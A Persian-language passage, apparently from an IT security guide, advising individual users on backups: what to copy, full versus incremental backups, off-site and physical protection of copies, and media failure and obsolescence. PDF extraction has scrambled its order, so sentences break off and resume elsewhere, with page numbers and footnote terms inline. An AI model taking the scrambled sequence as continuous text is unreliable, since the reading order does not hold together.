ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ،ﺗﻬﻴﺔ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻭ ﺫﺧﻴـﺮﺓ ﺁﻧﻬـﺎ ﺩﺭ ﻣﺤﻠﻲ ﺧﺎﺭﺝ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺭ ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﻛﻤـﻚ ﺷـﺎﻳﺎﻧﻲ ﺧﻮﺍﻫـﺪ ﺑﻮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴـﺰ ﺑـﻪ ﻫﻤﺮﺍﻩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﺷﺪﻩﺍﻧﺪ. ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﻭﻗﻮﻉ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻧﻈﻴﺮ ﺳﻴﻞ ،ﺯﻟﺰﻟﻪ ﻭ ﺁﺗﺶﺳﻮﺯﻱ ﺍﻫﻤﻴﺖ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻴﺸﺘﺮ ﺭﻭﺷﻦ ﻣـﻲﻛﻨﻨـﺪ .ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ ﻣﺤﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ. ﺑﻼﻳﺎﻱ ﺩﻳﮕﺮ ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻧﺸﺖ ﻟﻮﻟﻪﻫﺎﻱ ﮔﺎﺯ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺁﺗﺶﺳﻮﺯﻱ ﻧﺎﺷﻲ ﺍﺯ ﺁﻥ ﻳﺎ ﺭﻳﺨﺘﻪﺷﺪﻥ ﻣﻮﺍﺩ ﻣﺎﻳﻊ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺗﻬﻮﻳـﻪ ﺑﺎﻋـﺚ ﺑـﺮﻭﺯ ﻣﺸﻜﻞ ﻣﻲﮔﺮﺩﺩ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺰ ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ. ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧﻘﺶ ﻣﺆﺛﺮﻱ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﻭﺟﻮﺩ ﺍﹶﺷﻜﺎﻝ ﮔﻮﻧﺎﮔﻮﻥ ﺁﻧﻬﺎ ﭼﻨﺪﺍﻥ ﻋﺠﻴﺐ ﻧﻴﺴﺖ .ﻧﻜﺘـﺔ ﻗﺎﺑـﻞ ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻜﺎﺭﺭﻓﺘـﻪ ﺩﺭ ﻫﺮﻛـﺪﺍﻡ ﺍﺯ ﺷـﺮﺍﻳﻂ ﻓﻮﻕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺷﺮﺍﻳﻂ ﺩﻳﮕﺮ ﻛﺎﺭﺑﺮﺩﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﻪ ﺧــﺎﻃﺮ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺣﻔﺎﻇــﺖ ﭼﻨﺪﻻﻳــﻪ ﻭ ﺑﻜﺎﺭﮔﻴﺮﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻥ ﺗﻬﻴﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺟﻬـﺖ ﺍﻳﺠـﺎﺩ ﺍﺯ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﻳﺪ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩ؟ ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ: .۱ ﺍﺯ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺧﺘﺼﺎﺻﻲ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺳﺖ -ﺍﻟﺒﺘﻪ ﻏﻴﺮ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ -ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺍﻳـﻦ ﺍﻣﺮ ﺩﺭ ﻗﺪﻡ ﺍﻭﻝ ﺷﺎﻣﻞ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﺩﻩﺍﻱ ﻣـﻲﺷـﻮﺩ ﻭﻟـﻲ ﺩﻗــﺖ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺑﺎﻳــﺪ ﺍﺯ ﺗﻤــﺎﻡ ﻓﺎﻳﻠﻬــﺎﻳﻲ ﻛــﻪ Mirror Disks 20 ٥٩ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ .۲ ﺍﺯ ﻫﻤﻪ ﭼﻴﺰ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ .ﺑـﺎ ﺗﻬﻴـﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺗﻤﺎﻡ ﺳﻴـﺴﺘﻢ -ﺑـﺴﺘﻪ ﺑـﻪ ﻧـﻮﻉ ﺍﺳـﺘﻔﺎﺩﻩﺍﻱ ﻛـﻪ ﺍﺯ ﺁﻥ ﻣﻲﺷﻮﺩ -ﻣـﻲﺗـﻮﺍﻥ ﻛـﻞ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩ .ﻫﻤﭽﻨﻴﻦ ﻗـﺎﺩﺭ ﺧﻮﺍﻫﻴـﺪ ﺑـﻮﺩ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻳـﺎ ﺷﺎﺧﻪﻫﺎﻱ ﺧﺎﺹ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ. 
ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮ ﺩﻭ ﺭﻭﺵ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ: .۱ ﺑﻪ ﻣﺤﺾ ﺗﻜﻤﻴﻞ ﻧﺼﺐ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﺯ ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻼ ﻫﺮ ﭼﻨـﺪ ﻣـﺎﻩ ﻣﺸﺨﺼﺎﺕ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ -ﻣﺜ ﹰ ﻳﻜﺒﺎﺭ -ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ. .۲ ﺍﺯ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨـﺼﻲ ﺧـﻮﺩ ﻃﺒـﻖ ﻳـﻚ ﺯﻣﺎﻧﺒﻨـﺪﻱ ﺑـﺎ ﺩﻭﺭﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺑـﺴﺘﻪ ﺑـﻪ ﻧـﻮﻉ ﻛﺎﺭﺑﺮﺩ ،ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺭﻭﺷﻬﺎﻱ ﮔﻮﻧـﺎﮔﻮﻧﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ: • ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺧـﻮﺩ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻧﻤﺎﻳﻴﺪ )ﻫﺮ ﭼﻨﺪ ﻣﺎﻩ ﻳﻜﺒﺎﺭ( ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺣﺠﻢ ﻭﺳﻴﻌﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺍﻣﻜﺎﻥ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ. • ﭼﻨﺎﻧﭽﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺷﻤﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻣﺘﻨﺎﻭﺑﹰﺎ ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ،ﻭﻟﻲ ﺩﺭ ﻓﺎﺻﻠﻪﻫـﺎﻱ ﻛﻮﺗﺎﻩ ﻓﻘﻂ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻛﻨﻴـﺪ ﻛـﻪ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ .ﺑﻪ ﺍﻳﻦ ﻧـﻮﻉ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ٢٢ﻣﻲ ﮔﻮﻳﻨﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺑــﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﻓﺎﻳﻠﻬــﺎ ﺩﺭ ﺍﻳـﻦ ﻧــﻮﻉ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ،ﻫﻢ ﺑﻪ ﺁﺧـﺮﻳﻦ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﻭ ﻫﻢ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳـﺸﻲ ﻧﻴﺎﺯ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ. Compatibility Incremental Backup 21 22 ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻛﺠﺎ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ؟ ﭘﺎﺳﺦ ﺍﻳﻦ ﺳﺆﺍﻝ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻟﻴﻞ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺍﺳﺖ .ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺳﺮﻗﺖ ﻭ ﻳﺎ ﺁﺗﺶﺳﻮﺯﻱ ﺍﺳﺖ ﻣﺤﻞ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻧﺒﺎﻳﺪ ﻧﺰﺩﻳـﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺷﺪ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺟﺎﻳﻲ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺍﻳـﻦ ﻣﺸﻜﻼﺕ ﺍﺯ ﺣﻔﺎﻇﺖ ﻛﺎﻣﻞ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﺪ .ﻭﻟـﻲ ﺍﮔـﺮ ﺗﻬﻴـﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻓﻘﻂ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺩﺍﺩﻩﻫﺎﻱ ﭘﺎﻙ ﺷﺪﻩ ﻳﺎ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ ،ﺑﺎﻳـﺪ ﻣﺤـﻞ ﺁﻥ ﻃـﻮﺭﻱ ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﺩ ﻛـﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺁﺳﺎﻥ ﺑﺎﺷﺪ. ﻳﻚ ﺭﺍﻩ ﺣﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻛﺎﻣﻞ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤـﻞ ﺍﻣﻦ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺭﺍ ﺩﺭ ﻣﺤﻠﻲ ﻧﺰﺩﻳﻚ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺭﺍﻩ ﺩﻳﮕﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺟﺪﻳﺪﺗﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪﺷـﺪﻩ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ ﺭﺍ ﺩﺭ ﻣﺤﻠﻬـﺎﻱ ﺍﻣـﻦﺗـﺮ ﺑﮕﺬﺍﺭﻳﺪ .ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﻭ ﻧﺴﺨﻪ ﺗﻬﻴـﻪ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﻭﺭ ﺍﺯ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ. ﺍﮔﺮ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﺩﺍﺭﻳﺪ ﻛﻪ ﺳﺎﺭﻗﺎﻥ ﻗﺼﺪ ﺳﺮﻗﺖ ﺁﻧﻬﺎ ﺭﺍ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﺎ ﺳـﺮﻗﺖ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻫﻤـﺎﻥ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑﺪﺳـﺖ ﺁﻭﺭﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻻﺯﻡ ﺭﺍ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ. 
ﺁﻳﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ؟ ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻨﮕـﺎﻡ ﻧﻴـﺎﺯ ﻧﺘﻮﺍﻧﻴـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺗﻬﻴﻪﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ: • ﻧﺴﺨﺔ ﻣﺮﺑﻮﻃﻪ ﺑﺴﻴﺎﺭ ﻛﻬﻨﻪ ﻭ ﻳﺎ ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺻﺪﻣﻪ ﺩﻳﺪﻩ ﺑﺎﺷﺪ .ﺑﺮﻭﺯ ﺍﻳـﻦ ﻣـﺸﻜﻞ ﺩﺭ ﺩﻳـﺴﻜﻬﺎﻱ ﻓﻼﭘـﻲ ﻭ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ. • ﺩﺳﺘﮕﺎﻫﻲ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻥ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺍﺭﺍﻱ ﺍﺷﻜﺎﻝ ﺑـﻮﺩﻩ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺩﺍﺩﺓ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺭ ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ ﺑﺨﺶ ﺩﻭﻡ ﺳﺎﺯﮔﺎﺭﻱ ٢١ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑـﺮ ﻋﻬــﺪﻩ ﺩﺍﺭﻧــﺪ )ﻣﺜــﻞ ﺍﻧــﻮﺍﻉ ﻓﺎﻳﻠﻬــﺎﻱ ﺗﻨﻈﻴﻤــﺎﺕ ﻭ ﭘﻴﻜﺮﺑﻨــﺪﻱ( ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﮔﺮﺩﺩ .ﺗﻌﻴﻴﻦ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺻﺤﺖ ﺁﻧﻬﺎ ﺑـﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﺑـﺪﻭﻥ ﺍﺷﻜﺎﻝ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭﻱ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﭼﻨـﺪ ﺷـﺎﺧﻪ ﺍﺻــﻠﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ﻛـﻪ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﻳﻜﺘﺎ ﻭ ﺍﺧﺘﺼﺎﺻﻲ ﺷﻤﺎ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ. ﻻ ﮔﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻣﻌﻤـﻮ ﹰ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮ ﺩﺭ ﻣـﻮﺭﺩ ﭼﮕـﻮﻧﮕﻲ ﺗﻬﻴـﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ. ٦٠ ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺘﻮﺍﻥ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ ،ﭘﺸﺘﻴﺒﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺧﻮﺍﻧﺪ. • ﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﻭﻱ ﺁﻥ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺩﭼـﺎﺭ ﻧﻘﺺ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻧﻘﺺ ﺭﺳﺎﻧﻪ ﺩﺭ ﺩﻳﺴﻜﻬﺎﻱ ﻓﻼﭘﻲ ﺍﺷﻜﺎﻝ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺠﻲ ﺑﻮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺗﻨﻬﺎ ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﻪ ﺷﺪﻥ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﻣـﻲﺷـﺪ ﭼﻨﺪﺍﻥ ﺗﻌﺠﺐ ﻛﺴﻲ ﺭﺍ ﺑـﺮ ﻧﻤـﻲﺍﻧﮕﻴﺨـﺖ .ﺩﻳـﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﺑﻌﻨـﻮﺍﻥ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﻣﺎﻧـﺪﮔﺎﺭﺗﺮ ﺷـﻬﺮﺕ ﺩﺍﺷﺘﻨﺪ ،ﺍﻣﺎ ﻳـﻚ ﻣﻄﺎﻟﻌـﻪ ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﻧـﺸﺎﻥ ﺩﺍﺩ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩﺍﻱ ﻛﻪ ﻛﻴﻔﻴﺖ ﭼﻨﺪﺍﻥ ﻣﻄﻠﻮﺑﻲ ﻧﺪﺍﺭﻧـﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌـﺪ ﺍﺯ ﮔﺬﺷـﺖ ﺣـﺪﻭﺩ ﺩﻭ ﺳـﺎﻝ ﺍﺯ ﺯﻣـﺎﻥ ﻧﻮﺷﺘﻪﺷﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺷﻮﻧﺪ. ﺧﻮﺍﻧﺪﻥ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺩﺳﺘﮕﺎﻫﻲ ﻏﻴﺮ ﺍﺯ ﺁﻥ ﻛﻪ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺁﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﻛﻨﺘﺮﻝ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺻﺤﺖ ﺭﺳﺎﻧﺔ ﺣﺎﻭﻱ ﻧـﺴﺨﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺳـﺖ .ﺩﻗـﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙ ﻛـﺮﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲ ﻛﻨﻴـﺪ )ﻣﺜـﻞ ﺩﻳـﺴﻜﻬﺎﻱ Zipﻭ ﻓﻼﭘﻲ( ،ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮ ﻭ ﺗﻤﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ. 
ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺕ ﺑـﺴﻴﺎﺭ ﻃـﻮﻻﻧﻲ ﻧﮕـﻪ ﻣﻲﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺳﺆﺍﻝ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺍﺯ ﺍﺳﻨﺎﺩ ﻭ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؟ ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﺑﺮﺍﻱ ﺯﻣﺎﻥ ﻃـﻮﻻﻧﻲ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﺯ ﺭﺩﻩ ﺧـﺎﺭﺝ ﺷـﺪﻥ ﺭﺳﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﺩﺍﺩﻩﺍﻱ ﺩﺭ ﻳﻚ ﻓﻼﭘﻲ ﭘﻨﺞ ﺍﻳﻨﭽﻲ ﻛﻪ ﺩﺭ ﺳﺎﻝ ۱۹۸۰ﺭﺍﻳﺞ ﺑـﻮﺩﻩ ﺫﺧﻴـﺮﻩ 